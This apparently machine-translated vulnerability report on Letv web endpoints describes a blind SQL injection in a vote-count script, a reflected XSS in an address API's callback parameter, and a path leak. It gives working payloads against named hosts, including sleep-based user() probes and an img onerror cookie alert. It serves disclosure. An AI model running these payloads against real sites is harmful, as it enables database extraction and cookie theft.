Letv MySQL blind injection, callback reflective XSS and an absolute path Leakage

Letv MySQL blind injection, callback reflective XSS and an absolute path Leakage

The injection point is located (parameter ID ):

Http://joyearcars2014happy.hz.letv.com/php/votenum.php? Callback = jquery171017738118954002857_14087927555 & id = 1 & _ = 1408792945702

The reflected XSS is located:

Http://address.shop.letv.com/api/web/insert/insUserAddress.jsonp? Callback = callback __% 3 Cimg % 20src = aaaa % 20 onerror = alert (document. cookie) % 3E &

Absolute path leakage:

Http://joyearcars2014happy.hz.letv.com/php/joyearcar.php? Callback = aaaa & username =

Notice: Undefined index: tel in/letv/joyearcars2014happy.hz.letv.com/php/joyearcar.php on line 11

Test process

Http://joyearcars2014happy.hz.letv.com/php/votenum.php? Callback = jquery171017738118954002857_14087927555 & id = if (length (user ()> 22, sleep (1), 0) & _ = 1408792945702

It can be guessed that the length of the current connected user is 23.

I only guessed that the ASCII code of the first letter is 50, and the letter "2 ":

Http://joyearcars2014happy.hz.letv.com/php/votenum.php? Callback = jquery171017738118954002857_14087927555 & id = if (ascii (mid (user (), 1, 1) = 50, sleep (1), 2) -- & _ = 1408792945702

Non-root, not further exploited.
 

 

Solution:

Solve SQL Injection

Code callback

Detailed error message not displayed